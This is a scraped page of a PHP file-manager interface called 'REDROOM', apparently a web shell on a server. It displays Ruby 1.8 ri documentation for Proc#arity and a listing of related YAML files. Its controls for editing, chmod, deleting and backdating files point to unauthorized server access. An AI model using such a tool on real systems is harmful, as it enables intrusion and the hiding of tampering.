REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 930 B
Close
/proc/thread-self/root/opt/alt/ruby18/share/ri/1.8/system/Proc/arity-i.yaml
Text
Base64
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Returns the number of arguments that would not be ignored. If the block is declared to take no arguments, returns 0. If the block is known to take exactly n arguments, returns n. If the block has optional arguments, return -n-1, where n is the number of mandatory arguments. A <tt>proc</tt> with no argument declarations is the same a block declaring <tt>||</tt> as its arguments. - !ruby/struct:SM::Flow::VERB body: " Proc.new {}.arity #=> 0\n Proc.new {||}.arity #=> 0\n Proc.new {|a|}.arity #=> 1\n Proc.new {|a,b|}.arity #=> 2\n Proc.new {|a,b,c|}.arity #=> 3\n Proc.new {|*a|}.arity #=> -1\n Proc.new {|a,*b|}.arity #=> -2\n" full_name: Proc#arity is_singleton: false name: arity params: | prc.arity -> fixnum visibility: public
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 10
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
%3d%3d-i.yaml
358 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
%5b%5d-i.yaml
1.37 KB
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
arity-i.yaml
930 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
binding-i.yaml
601 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
call-i.yaml
1.37 KB
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
cdesc-Proc.yaml
1.10 KB
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
clone-i.yaml
223 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
new-c.yaml
662 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
to_proc-i.yaml
352 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
to_s-i.yaml
318 B
lrw-r--r--
2023-07-26 13:47:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).